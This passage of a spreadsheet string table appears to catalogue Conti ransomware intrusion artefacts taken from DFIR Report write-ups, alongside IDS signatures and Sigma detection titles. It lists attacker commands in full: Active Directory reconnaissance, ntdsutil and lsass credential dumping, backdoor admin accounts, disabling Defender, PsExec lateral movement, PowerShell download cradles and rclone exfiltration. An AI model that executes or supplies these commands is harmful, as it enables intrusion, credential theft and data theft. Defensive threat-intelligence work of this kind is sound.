    <t>{"date": "2022-04"url": "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", "tags": ["conti"]}</t>
  </si>
  <si>
    <t>ipconfig /all</t>
  </si>
  <si>
    <t>systeminfo</t>
  </si>
  <si>
    <t>WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List</t>
  </si>
  <si>
    <t>net config workstation</t>
  </si>
  <si>
    <t>nltest /domain_trusts</t>
  </si>
  <si>
    <t>net view /all</t>
  </si>
  <si>
    <t>ipconfig-pid</t>
  </si>
  <si>
    <t>cmd.exe /C nltest /dclist:</t>
  </si>
  <si>
    <t>cmd.exe /C net group /domain "Domain Computers"</t>
  </si>
  <si>
    <t>cmd.exe /C net group /domain "Enterprise Admins"</t>
  </si>
  <si>
    <t>cmd.exe /c chcp &gt;&amp;2</t>
  </si>
  <si>
    <t>adfind.exe -f "(objectcategory=person)"</t>
  </si>
  <si>
    <t xml:space="preserve">adfind.exe -f "objectcategory=computer" </t>
  </si>
  <si>
    <t xml:space="preserve">adfind.exe -f "(objectcategory=organizationalUnit)" </t>
  </si>
  <si>
    <t>adfind.exe -gcb -sc trustdmp</t>
  </si>
  <si>
    <t>adfind.exe -subnets -f (objectCategory=subnet)</t>
  </si>
  <si>
    <t>adfind.exe  -sc trustdmp</t>
  </si>
  <si>
    <t>cmd /c ping \\redacted\</t>
  </si>
  <si>
    <t>conhost.exe 0xffffffff - ForceV1</t>
  </si>
  <si>
    <t>C:\Windows\system32\cmd.exe /C dir “\\&lt;REDACTED&gt;\C$” /s &gt;&gt; listback.txt</t>
  </si>
  <si>
    <t>C:\Windows\system32\cmd.exe /C dir “\\&lt;REDACTED&gt;\C$” /s &gt;&gt; list1.txt</t>
  </si>
  <si>
    <t>file_path</t>
  </si>
  <si>
    <t>object</t>
  </si>
  <si>
    <t>pipeName: \MSSE-3328-server and Image: 61582ab.exe</t>
  </si>
  <si>
    <t>named_pipe</t>
  </si>
  <si>
    <t>pipeName: \MSSE-7344-server and Image: 044b7e1.exe</t>
  </si>
  <si>
    <t>ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response
ET MALWARE Cobalt Strike Beacon Activity (GET)
ETPRO POLICY Observed Atera Remote Access Application Activity Domain in TLS SNI
ET POLICY Command Shell Activity Over SMB - Possible Lateral Movement
ET POLICY SMB Executable File Transfer
ET POLICY SMB2 NT Create AndX Request For an Executable File
ET HUNTING Possible Powershell .ps1 Script Use Over SMB
ET POLICY SMB2 NT Create AndX Request For a Powershell .ps1 File</t>
  </si>
  <si>
    <t>etpro</t>
  </si>
  <si>
    <t>Atera Agent</t>
  </si>
  <si>
    <t>Splashtop</t>
  </si>
  <si>
    <t>Cobalt Strike</t>
  </si>
  <si>
    <t>c2</t>
  </si>
  <si>
    <t>AteraAgent.exe</t>
  </si>
  <si>
    <t>file_name</t>
  </si>
  <si>
    <t>SplashtopStreamer3360.exe</t>
  </si>
  <si>
    <t>dllhost.exe accessed lsass memory</t>
  </si>
  <si>
    <t>rundll32.exe \\host\c$\ProgramData\c64.dll, StartA</t>
  </si>
  <si>
    <t>c:\windows\system32\msiexec.exe /I C:\programdata\sql.msi</t>
  </si>
  <si>
    <t>conti-eid0147</t>
  </si>
  <si>
    <t>conti-eid0148</t>
  </si>
  <si>
    <t>conti-eid0149</t>
  </si>
  <si>
    <t>conti-eid0150</t>
  </si>
  <si>
    <t>conti-eid0151</t>
  </si>
  <si>
    <t>conti-eid0152</t>
  </si>
  <si>
    <t>conti-eid0153</t>
  </si>
  <si>
    <t>conti-eid0154</t>
  </si>
  <si>
    <t>conti-eid0155</t>
  </si>
  <si>
    <t>conti-eid0156</t>
  </si>
  <si>
    <t>conti-eid0157</t>
  </si>
  <si>
    <t>conti-eid0158</t>
  </si>
  <si>
    <t>conti-eid0159</t>
  </si>
  <si>
    <t>conti-eid0160</t>
  </si>
  <si>
    <t>conti-eid0161</t>
  </si>
  <si>
    <t>conti-eid0162</t>
  </si>
  <si>
    <t>conti-eid0163</t>
  </si>
  <si>
    <t>conti-eid0164</t>
  </si>
  <si>
    <t>conti-eid0165</t>
  </si>
  <si>
    <t>conti-eid0166</t>
  </si>
  <si>
    <t>conti-eid0167</t>
  </si>
  <si>
    <t>conti-eid0168</t>
  </si>
  <si>
    <t>conti-eid0169</t>
  </si>
  <si>
    <t>conti-eid0170</t>
  </si>
  <si>
    <t>conti-eid0171</t>
  </si>
  <si>
    <t>conti-eid0172</t>
  </si>
  <si>
    <t>conti-eid0173</t>
  </si>
  <si>
    <t>conti-eid0174</t>
  </si>
  <si>
    <t>conti-eid0175</t>
  </si>
  <si>
    <t>conti-eid0176</t>
  </si>
  <si>
    <t>conti-eid0177</t>
  </si>
  <si>
    <t>conti-eid0178</t>
  </si>
  <si>
    <t>conti-eid0179</t>
  </si>
  <si>
    <t>conti-eid0180</t>
  </si>
  <si>
    <t>conti-eid0181</t>
  </si>
  <si>
    <t>conti-eid0182</t>
  </si>
  <si>
    <t>conti-eid0183</t>
  </si>
  <si>
    <t>conti-eid0184</t>
  </si>
  <si>
    <t>cmd /c dir "\\host\c$" /s&gt;&gt; listback.txt</t>
  </si>
  <si>
    <t>regsvr32.exe /s /n /i:"-m -net -size 10 -nomutex -p \\host\C$" x64.dll</t>
  </si>
  <si>
    <t>conti-eid0185</t>
  </si>
  <si>
    <t>regsvr32.exe /s c:\users\&lt;uname&gt;\AppData\Local\Temp\Ewge.dll</t>
  </si>
  <si>
    <t>C:\Users\&lt;uname&gt;\AppData\LocalTemp\Faicury4.exe</t>
  </si>
  <si>
    <t>conti-eid0186</t>
  </si>
  <si>
    <t>conti-eid0187</t>
  </si>
  <si>
    <t>regsvr-pid</t>
  </si>
  <si>
    <t>{"object": "process_create", "initiating_process_command_line": "msiexec.exe /V", "process_command_line": r''' "AleterAgent.exe" /i /IntegratorLogin="" /CompanyId="" /IntegratorLoginUI="" /CompanyIdUI="" '''}</t>
  </si>
  <si>
    <t>{"object": "process_create", "initiating_process_command_line": "msiexec.exe /V", "process_command_line": r''' "AleterAgent.exe" /i /IntegratorLogin="" /CompanyId="" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="" '''}</t>
  </si>
  <si>
    <t>{"object": "process_create", "initiating_process_command_line": "msiexec.exe /V", "process_command_line": r''' "AleterAgent.exe" /u '''}</t>
  </si>
  <si>
    <t>conti-eid0188</t>
  </si>
  <si>
    <t>conti-eid0189</t>
  </si>
  <si>
    <t>conti-eid0190</t>
  </si>
  <si>
    <t>powershell -nop -exec bypass -EncodedCommand</t>
  </si>
  <si>
    <t>conti-eid0191</t>
  </si>
  <si>
    <t>{"object": "open_process_api_call", "process_command_line": "lsass.exe", "initiating_process_command_line": r''' "taskmgr.exe" /4 ''', "desired_access": "5136"}</t>
  </si>
  <si>
    <t>{"object": "open_process_api_call", "process_command_line": "lsass.exe", "initiating_process_command_line": r''' rundll32.exe \\host\c$\ProgramData\c64.dll, StartA''', "desired_access": "64"}</t>
  </si>
  <si>
    <t>{"object": "open_process_api_call", "process_command_line": "lsass.exe", "initiating_process_command_line": r''' dllhost.exe''', "desired_access": "4112"}</t>
  </si>
  <si>
    <t>{"object": "open_process_api_call", "process_command_line": "lsass.exe", "initiating_process_command_line": r''' taskmgr''', "desired_access": "5136"}</t>
  </si>
  <si>
    <t>{"object": "open_process_api_call", "process_command_line": "lsass.exe", "initiating_process_command_line": r''' regsvr32.exe /s "c:\Users\uname\AppData\Local\Temp\Edebef4.dll''', "desired_access": "64"}</t>
  </si>
  <si>
    <t>conti-eid0192</t>
  </si>
  <si>
    <t>conti-eid0193</t>
  </si>
  <si>
    <t>conti-eid0194</t>
  </si>
  <si>
    <t>conti-eid0195</t>
  </si>
  <si>
    <t>conti-eid0196</t>
  </si>
  <si>
    <t>Desired Access = 5136 Hex Value 1410 PROCESS_VM_READ (0x0010) PROCESS_QUERY_INFORMATION (0x0400) PROCESS_QUERY_LIMITED_INFORMATION (0x1000)*</t>
  </si>
  <si>
    <t>Desired Access = 4112 Hex Value 1010 PROCESS_VM_READ (0x0010) PROCESS_QUERY_LIMITED_INFORMATION (0x1000)</t>
  </si>
  <si>
    <t>Desired Access = 64 Hex Value 40 PROCESS_DUP_HANDLE (0x0040)</t>
  </si>
  <si>
    <t>conti-eid0197</t>
  </si>
  <si>
    <t>conti-eid0198</t>
  </si>
  <si>
    <t>conti-eid0199</t>
  </si>
  <si>
    <t>{"object": "process_create", "initiating_process_command_line": "cmd.exe /c backup.bat", "process_command_line": "conhost.exe 0xffffffff -ForceV1"}</t>
  </si>
  <si>
    <t>conti-eid0200</t>
  </si>
  <si>
    <t>sigma</t>
  </si>
  <si>
    <t>LSASS Memory Dump : 5ef9853e-4d0e-4a70-846f-a9ca37d876da</t>
  </si>
  <si>
    <t>Malicious PowerView PowerShell Commandlets : dcd74b95-3f36-4ed9-9598-0490951643aa</t>
  </si>
  <si>
    <t>AdFind Usage Detection : 9a132afa-654e-11eb-ae93-0242ac130002</t>
  </si>
  <si>
    <t>Powershell Defender Disable Scan Feature : 1ec65a5f-9473-4f12-97da-622044d6df21</t>
  </si>
  <si>
    <t>url</t>
  </si>
  <si>
    <t>Access to ADMIN$ Share : 098d7118-55bc-4912-a836-dc6483a8d150</t>
  </si>
  <si>
    <t>Atera Agent Installation : 87261fb2-69d0-42fe-b9de-88c6b5f65a43</t>
  </si>
  <si>
    <t>Domain Trust Discovery : 3bad990e-4848-4a78-9530-b427d854aac0</t>
  </si>
  <si>
    <t>Suspicious Reconnaissance Activity : d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
  </si>
  <si>
    <t>CobaltStrike Service Installations : d7a95147-145f-4678-b85d-d1ff4a3bb3f6</t>
  </si>
  <si>
    <t>{"object": "service_install", "file_name": \\host\ADMIN$\044b7e1.exe"}</t>
  </si>
  <si>
    <t>conti-eid0201</t>
  </si>
  <si>
    <t>conti-eid0202</t>
  </si>
  <si>
    <t>conti-eid0203</t>
  </si>
  <si>
    <t>conti-eid0204</t>
  </si>
  <si>
    <t>conti-eid0205</t>
  </si>
  <si>
    <t>conti-eid0206</t>
  </si>
  <si>
    <t>conti-eid0207</t>
  </si>
  <si>
    <t>conti-eid0208</t>
  </si>
  <si>
    <t>conti-eid0209</t>
  </si>
  <si>
    <t>{"date": "2021-09"url": "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/", "tags": ["conti"]}</t>
  </si>
  <si>
    <t>C:\Windows\system32\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}</t>
  </si>
  <si>
    <t>beacon</t>
  </si>
  <si>
    <t>C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService</t>
  </si>
  <si>
    <t>rundll32.exe C:\Users\USER\AppData\Local\Temp\7A86.dll,DllRegisterServer</t>
  </si>
  <si>
    <t>C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc</t>
  </si>
  <si>
    <t>net localgroup "administrator"</t>
  </si>
  <si>
    <t>net group "domain admins" /dom</t>
  </si>
  <si>
    <t>C:\Windows\system32\net1 group "domain admins" /dom</t>
  </si>
  <si>
    <t>C:\Windows\system32\cmd.exe /C systeminfo</t>
  </si>
  <si>
    <t>C:\Windows\system32\cmd.exe /C ping DOMAINCONTROLLER</t>
  </si>
  <si>
    <t>C:\Windows\system32\cmd.exe /C ping ENDPOINT</t>
  </si>
  <si>
    <t>C:\Windows\system32\cmd.exe /C net localgroup Administrators</t>
  </si>
  <si>
    <t>C:\Windows\System32\Taskmgr.exe</t>
  </si>
  <si>
    <t>C:\Windows\system32\cmd.exe /C time</t>
  </si>
  <si>
    <t>{"object": "net", "initiating_process_command_line": "svchost.exe -k UnistackSvcGroup -s WpnUserService", "remote_port": "445"}</t>
  </si>
  <si>
    <t>svchost injected with beacon scan smb</t>
  </si>
  <si>
    <t xml:space="preserve">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -exec bypass -EncodedCommand </t>
  </si>
  <si>
    <t>IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:33242/'); Get-WmiObject -Class win32_logicalDisk -ComputerName SYSTEMNAME | Select-Object pscomputername, Name, @{n="Space";e={[math]::Round($_.Size/1GB,2)}}, @{n="FreeSpace";e={[math]::Round($_.FreeSpace/1GB,2)}}, @{n="BUSY";e={[math]::Round(($_.Size-$_.FreeSpace)/1GB,2)}}</t>
  </si>
  <si>
    <t>powershell.exe -executionpolicy remotesigned -File .\Get-DataInfo.ps1 method</t>
  </si>
  <si>
    <t>Get-ADComputer -Filter {enabled -eq $true} -properties *|select Name, DNSHostName, OperatingSystem, LastLogonDate | Export-CSV C:\Users\AllWindows.csv -NoTypeInformation -Encoding UTF8</t>
  </si>
  <si>
    <t>C:\Windows\system32\cmd.exe /C wmic /node:"DOMAINCONTROLLER" process call create "C:\3.exe"</t>
  </si>
  <si>
    <t>C:\Users\REDACTED\AppData\Local\Temp\1\is-HCFKT.tmp\WinSCP-5.19.1-Setup.tmp" /SL5="$A02B0,10288106,864256,C:\Users\USER\Desktop\WinSCP-5.19.1-Setup.exe"</t>
  </si>
  <si>
    <t>C:\Windows\system32\cmd.exe /C wmic /node:"ENDPOINT" process call create "C:\test.exe"</t>
  </si>
  <si>
    <t>ET MALWARE Observed Malicious SSL Cert (Bazar Backdoor)
ET MALWARE Observed Malicious SSL Cert (Bazar CnC)
ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2
ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response
ET POLICY TLS possible TOR SSL traffic
ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 234
ET HUNTING Possible Powershell .ps1 Script Use Over SMB
ET POLICY Possible WMI .mof Managed Object File Use Over SMB
ET POLICY SMB2 NT Create AndX Request For a .bat File
ET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement
ET POLICY SMB2 NT Create AndX Request For an Executable File
ET POLICY SMB2 NT Create AndX Request For a Powershell .ps1 File
ET SCAN Behavioral Unusual Port 135 traffic Potential Scan or Infection</t>
  </si>
  <si>
    <t>CobaltStrike Service Installations : 5a105d34-05fc-401e-8553-272b45c1522d</t>
  </si>
  <si>
    <t>Suspicious Remote Thread Created : 66d31e5f-52d6-40a4-9615-002d3789a119</t>
  </si>
  <si>
    <t>Quick Execution of a Series of Suspicious Commands : 61ab5496-748e-4818-a92f-de78e20fe7f1</t>
  </si>
  <si>
    <t>Pass the Hash Activity 2 : 8eef149c-bd26-49f2-9e5a-9b00e3af499b</t>
  </si>
  <si>
    <t>Suspicious WMI Execution : 526be59f-a573-4eea-b5f7-f0973207634d</t>
  </si>
  <si>
    <t>Encoded IEX : 88f680b8-070e-402c-ae11-d2914f2257f1</t>
  </si>
  <si>
    <t>Successful Overpass the Hash Attempt : 192a0330-c20b-4356-90b6-7b7049ae0b87</t>
  </si>
  <si>
    <t>conti-eid0210</t>
  </si>
  <si>
    <t>conti-eid0211</t>
  </si>
  <si>
    <t>conti-eid0212</t>
  </si>
  <si>
    <t>conti-eid0213</t>
  </si>
  <si>
    <t>conti-eid0214</t>
  </si>
  <si>
    <t>conti-eid0215</t>
  </si>
  <si>
    <t>conti-eid0216</t>
  </si>
  <si>
    <t>conti-eid0217</t>
  </si>
  <si>
    <t>conti-eid0218</t>
  </si>
  <si>
    <t>conti-eid0219</t>
  </si>
  <si>
    <t>conti-eid0220</t>
  </si>
  <si>
    <t>conti-eid0221</t>
  </si>
  <si>
    <t>conti-eid0222</t>
  </si>
  <si>
    <t>conti-eid0223</t>
  </si>
  <si>
    <t>conti-eid0224</t>
  </si>
  <si>
    <t>conti-eid0225</t>
  </si>
  <si>
    <t>conti-eid0226</t>
  </si>
  <si>
    <t>conti-eid0227</t>
  </si>
  <si>
    <t>conti-eid0228</t>
  </si>
  <si>
    <t>conti-eid0229</t>
  </si>
  <si>
    <t>conti-eid0230</t>
  </si>
  <si>
    <t>conti-eid0231</t>
  </si>
  <si>
    <t>conti-eid0232</t>
  </si>
  <si>
    <t>conti-eid0233</t>
  </si>
  <si>
    <t>conti-eid0234</t>
  </si>
  <si>
    <t>conti-eid0235</t>
  </si>
  <si>
    <t>conti-eid0236</t>
  </si>
  <si>
    <t>conti-eid0237</t>
  </si>
  <si>
    <t>conti-eid0238</t>
  </si>
  <si>
    <t>conti-eid0239</t>
  </si>
  <si>
    <t>conti-eid0240</t>
  </si>
  <si>
    <t>conti-eid0241</t>
  </si>
  <si>
    <t>{"date": "2021-10": "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", "tags": ["conti"]}</t>
  </si>
  <si>
    <t>AnyDesk</t>
  </si>
  <si>
    <t>Advanced Ip Scanner</t>
  </si>
  <si>
    <t>seatbelt</t>
  </si>
  <si>
    <t xml:space="preserve">Cobalt Strike </t>
  </si>
  <si>
    <t>Rclone</t>
  </si>
  <si>
    <t>Mega</t>
  </si>
  <si>
    <t>rundll32.exe C:\Users\USER\AppData\Local\Temp\randomstring.dll,#1</t>
  </si>
  <si>
    <t>{"object": "process_create", "initiating_process_command_line": "svchost.exe -k UnistackSvcGroup", "process_command_line": "rundll32.exe C:\Users\USER\AppData\Local\Temp\randomstring.dll,EntryPoint"}</t>
  </si>
  <si>
    <t>net user sqlbackup qc69t4b#z0ke3 /add</t>
  </si>
  <si>
    <t>net user localadmin qc69t4b#z0ke3 /add</t>
  </si>
  <si>
    <t>net localgroup administrators localadmin /add</t>
  </si>
  <si>
    <t>{"object": "service_install", "file_name": c:\Program Files (x86)\AnyDesk\AnyDesk.exe --service"}</t>
  </si>
  <si>
    <t>ntdsutil "ac in ntds" "ifm" "create full c:\windows\temp\crashpad\x" q q</t>
  </si>
  <si>
    <t>ntdsAudit.exe ntds.dit -s SYSTEM -p pwddump.txt -u users.csv</t>
  </si>
  <si>
    <t xml:space="preserve">net view /all  </t>
  </si>
  <si>
    <t xml:space="preserve">net group "domain admins" /dom </t>
  </si>
  <si>
    <t xml:space="preserve">nltest /dclist </t>
  </si>
  <si>
    <t>net group "Domain Admins" /dom</t>
  </si>
  <si>
    <t>tasklist</t>
  </si>
  <si>
    <t>net  localgroup Administrateurs</t>
  </si>
  <si>
    <t>net localgroup Administrators</t>
  </si>
  <si>
    <t>SYSTEMINFO</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": "cmd.exe /c ipconfig", "initiating_process_command_line": "rundll32.exe c:\users\uname\appdata\local\temp\37b.dll, entrypoint"}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": "cmd.exe /c ipconfig /all", "initiating_process_command_line": "rundll32.exe c:\users\uname\appdata\local\temp\37b.dll, entrypoint"}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": "cmd.exe /c ping", "initiating_process_command_line": "rundll32.exe c:\users\uname\appdata\local\temp\37b.dll, entrypoint"}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": "cmd.exe /c nltest /dclist", "initiating_process_command_line": "rundll32.exe c:\users\uname\appdata\local\temp\37b.dll, entrypoint"}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": "cmd.exe /c net group "Domain Admins" /dom", "initiating_process_command_line": "rundll32.exe c:\users\uname\appdata\local\temp\37b.dll, entrypoint"}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": "cmd.exe /c tasklist", "initiating_process_command_line": "rundll32.exe c:\users\uname\appdata\local\temp\37b.dll, entrypoint"}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": "cmd.exe /c net localgroup administators", "initiating_process_command_line": "rundll32.exe c:\users\uname\appdata\local\temp\37b.dll, entrypoint"}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": "cmd.exe /c systeminfo", "initiating_process_command_line": "rundll32.exe c:\users\uname\appdata\local\temp\37b.dll, entrypoint"}</t>
  </si>
  <si>
    <t xml:space="preserve">adfind.exe -f "(objectcategory=person)" </t>
  </si>
  <si>
    <t xml:space="preserve">adfind.exe -f "(objectcategory=organizationalunit)" </t>
  </si>
  <si>
    <t xml:space="preserve">adfind.exe -sc trustdmp </t>
  </si>
  <si>
    <t xml:space="preserve">adfind.exe -subnets -f (objectcategory=subnet)  </t>
  </si>
  <si>
    <t>adfind.exe -f "(objectcategory=group)"</t>
  </si>
  <si>
    <t xml:space="preserve">net use </t>
  </si>
  <si>
    <t>netstat -ano</t>
  </si>
  <si>
    <t>net group "domain admins" /domain</t>
  </si>
  <si>
    <t xml:space="preserve">arp -a </t>
  </si>
  <si>
    <t>ping -n 1 hostname &gt;&gt; C:\programdata\log.txt</t>
  </si>
  <si>
    <t>Advanced_IP_Scanner_2.5.3850.exe</t>
  </si>
  <si>
    <t>Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\shares.txt</t>
  </si>
  <si>
    <t>Get-NetDomain</t>
  </si>
  <si>
    <t>Get-NetCurrentUser</t>
  </si>
  <si>
    <t>Get-ADDomainController</t>
  </si>
  <si>
    <t>Get-ADDomainController -Filter * | ft</t>
  </si>
  <si>
    <t>Get-ADComputer -Filter * -Properties * | Get-Member</t>
  </si>
  <si>
    <t>Get-ADDomain</t>
  </si>
  <si>
    <t>dir "\\hostname\c$\Program Files\* &gt;&gt; C:\programdata\AV.txt</t>
  </si>
  <si>
    <t xml:space="preserve">rclone.exe copy--max-age 3y "\\&lt;redacted&gt;\C$\Shares" remote: &lt;redacted&gt;\&lt;redacted&gt; --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P </t>
  </si>
  <si>
    <t>CMDline args 
- copy: Copy the source to the destination 
- --max-age: Only transfer files younger than &lt;time&gt; 
- \\&lt;redacted&gt;B: From source 
- remote: &lt;redacted&gt;\&lt;redacted&gt;: To destination folder 
- Bwlimit 2M: Bandwidth limit 
- -q: quiet 
- --ignore-existing: Skip all files that exist on destination 
- --auto-confirm: Do not request console confirmation 
- --multi-thread-streams: Max number of streams to use for multi-thread downloads 
- --transfers: Number of file transfers to run in parallel 
- -P: Show progress</t>
  </si>
  <si>
    <t>ET TROJAN Observed Malicious SSL Cert (BazaLoader CnC) 
ET MALWARE Observed Malicious SSL Cert (Bazar Backdoor) 
ET POLICY IP Check Domain (myexternalip .com in TLS SNI) 
ET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software) 
ET USER_AGENTS AnyDesk Remote Desktop Software User-Agent 
ET POLICY HTTP POST to MEGA Userstorage</t>
  </si>
  <si>
    <t>conti-eid0242</t>
  </si>
  <si>
    <t>conti-eid0243</t>
  </si>
  <si>
    <t>conti-eid0244</t>
  </si>
  <si>
    <t>conti-eid0245</t>
  </si>
  <si>
    <t>conti-eid0246</t>
  </si>
  <si>
    <t>conti-eid0247</t>
  </si>
  <si>
    <t>conti-eid0248</t>
  </si>
  <si>
    <t>conti-eid0249</t>
  </si>
  <si>
    <t>conti-eid0250</t>
  </si>
  <si>
    <t>conti-eid0251</t>
  </si>
  <si>
    <t>conti-eid0252</t>
  </si>
  <si>
    <t>conti-eid0253</t>
  </si>
  <si>
    <t>conti-eid0254</t>
  </si>
  <si>
    <t>conti-eid0255</t>
  </si>
  <si>
    <t>conti-eid0256</t>
  </si>
  <si>
    <t>conti-eid0257</t>
  </si>
  <si>
    <t>conti-eid0258</t>
  </si>
  <si>
    <t>conti-eid0259</t>
  </si>
  <si>
    <t>conti-eid0260</t>
  </si>
  <si>
    <t>conti-eid0261</t>
  </si>
  <si>
    <t>conti-eid0262</t>
  </si>
  <si>
    <t>conti-eid0263</t>
  </si>
  <si>
    <t>conti-eid0264</t>
  </si>
  <si>
    <t>conti-eid0265</t>
  </si>
  <si>
    <t>conti-eid0266</t>
  </si>
  <si>
    <t>conti-eid0267</t>
  </si>
  <si>
    <t>conti-eid0268</t>
  </si>
  <si>
    <t>conti-eid0269</t>
  </si>
  <si>
    <t>conti-eid0270</t>
  </si>
  <si>
    <t>conti-eid0271</t>
  </si>
  <si>
    <t>conti-eid0272</t>
  </si>
  <si>
    <t>conti-eid0273</t>
  </si>
  <si>
    <t>conti-eid0274</t>
  </si>
  <si>
    <t>conti-eid0275</t>
  </si>
  <si>
    <t>conti-eid0276</t>
  </si>
  <si>
    <t>conti-eid0277</t>
  </si>
  <si>
    <t>conti-eid0278</t>
  </si>
  <si>
    <t>conti-eid0279</t>
  </si>
  <si>
    <t>conti-eid0280</t>
  </si>
  <si>
    <t>conti-eid0281</t>
  </si>
  <si>
    <t>conti-eid0282</t>
  </si>
  <si>
    <t>conti-eid0283</t>
  </si>
  <si>
    <t>conti-eid0284</t>
  </si>
  <si>
    <t>conti-eid0285</t>
  </si>
  <si>
    <t>conti-eid0286</t>
  </si>
  <si>
    <t>conti-eid0287</t>
  </si>
  <si>
    <t>conti-eid0288</t>
  </si>
  <si>
    <t>conti-eid0289</t>
  </si>
  <si>
    <t>conti-eid0290</t>
  </si>
  <si>
    <t>conti-eid0291</t>
  </si>
  <si>
    <t>conti-eid0292</t>
  </si>
  <si>
    <t>conti-eid0293</t>
  </si>
  <si>
    <t>conti-eid0294</t>
  </si>
  <si>
    <t>conti-eid0295</t>
  </si>
  <si>
    <t>conti-eid0296</t>
  </si>
  <si>
    <t>conti-eid0297</t>
  </si>
  <si>
    <t>conti-eid0298</t>
  </si>
  <si>
    <t>conti-eid0299</t>
  </si>
  <si>
    <t>conti-eid0300</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": "cmd c/ nltest /domain_trusts /all_trusts", "C:\Windows\system32\svchost.exe -k UnistackSvcGroup"}</t>
  </si>
  <si>
    <t>conti-eid0301</t>
  </si>
  <si>
    <t>Set-MpPreference -DisableRealtimeMonitoring $true</t>
  </si>
  <si>
    <t xml:space="preserve">ntdsutil "ac in ntds" "ifm" "cr fu C:\Perflogs\1" q q </t>
  </si>
  <si>
    <t>nltest /dclist:&lt;hidden&gt;.local</t>
  </si>
  <si>
    <t>whoami.exe" /groups</t>
  </si>
  <si>
    <t>adfind.exe -f "(objectcategory=organizationalUnit)"</t>
  </si>
  <si>
    <t>adfind.exe -f "objectcategory=computer"</t>
  </si>
  <si>
    <t>C:\Windows\Temp\adf\ad_group.txt</t>
  </si>
  <si>
    <t>C:\Windows\Temp\adf\trustdmp.txt</t>
  </si>
  <si>
    <t>C:\Windows\Temp\adf\subnets.txt</t>
  </si>
  <si>
    <t>C:\Windows\Temp\adf\ad_ous.txt</t>
  </si>
  <si>
    <t>C:\Windows\Temp\adf\ad_computers.txt</t>
  </si>
  <si>
    <t xml:space="preserve">C:\Windows\Temp\adf\ad_users.txt </t>
  </si>
  <si>
    <t>C:\Windows\Temp\Dogi</t>
  </si>
  <si>
    <t>bloodhound results</t>
  </si>
  <si>
    <t>Get-NetSubnet</t>
  </si>
  <si>
    <t xml:space="preserve">Get-NetComputer –ping </t>
  </si>
  <si>
    <t>powersploit-pid</t>
  </si>
  <si>
    <t>IEX(New - Object Net.Webclient).DownloadString('http://IP:port/')</t>
  </si>
  <si>
    <t>wmic /node: DEVICE LOCAL process call create "c:\Users\165.bat"</t>
  </si>
  <si>
    <t>C:\share$</t>
  </si>
  <si>
    <t>start PsExec.exe -accepteula @C:\share$\comps1.txt -u "domain\User" -p "$PASSWORD" cmd /c COPY "\\DOMAINCONTROLLER\share$\fQumH.exe" "C:\windows\temp\"</t>
  </si>
  <si>
    <t>start PsExec.exe -accepteula -d @C:\share$\comps5.txt -u "domain\User" -p "$PASSWORD" cmd /c "C:\windows\temp\fQumH.exe"</t>
  </si>
  <si>
    <t>netscan.exe</t>
  </si>
  <si>
    <t>procdump.exe</t>
  </si>
  <si>
    <t xml:space="preserve">ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) 
ET CNC Feodo Tracker Reported CnC Server group 1 
ET CNC Feodo Tracker Reported CnC Server group 2 
ET CNC Feodo Tracker Reported CnC Server group 3 
ET CNC Feodo Tracker Reported CnC Server group 5 
ET CNC Feodo Tracker Reported CnC Server group 8 
ET CNC Feodo Tracker Reported CnC Server group 9 
ET CNC Feodo Tracker Reported CnC Server group 19 
ET CNC Feodo Tracker Reported CnC Server group 22 
ET CNC Feodo Tracker Reported CnC Server group 23 
ET CNC Feodo Tracker Reported CnC Server group 24 
ET POLICY HTTP traffic on port 443 (POST) 
ET POLICY PE EXE or DLL Windows file download HTTP 
ET POLICY curl User-Agent Outbound 
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response 
ET INFO Executable Download from dotted-quad Host 
ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 
ET MALWARE Trickbot Checkin Response 
ET POLICY Observed Cloudflare DNS over HTTPS Domain (cloudflare-dns .com in TLS SNI) 
ET HUNTING Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration 
ET MALWARE Win32/Trickbot Data Exfiltration 
ET POLICY IP Check wtfismyip.com 
GPL ATTACK_RESPONSE command completed 
ET HUNTING Observed Suspicious SSL Cert (External IP Lookup - ident .me) 
ET INFO Dotted Quad Host DLL Request 
ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M3 
ET POLICY Possible External IP Lookup ipinfo.io </t>
  </si>
  <si>
    <t>Abused Debug Privilege by Arbitrary Parent Processes - d522eca2-2973-4391-a3e0-ef0374321dae</t>
  </si>
  <si>
    <t>Accessing WinAPI in PowerShell. Code Injection. - eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50</t>
  </si>
  <si>
    <t>Bad Opsec Powershell Code Artifacts - 73e733cc-1ace-3212-a107-ff2523cc9fc3</t>
  </si>
  <si>
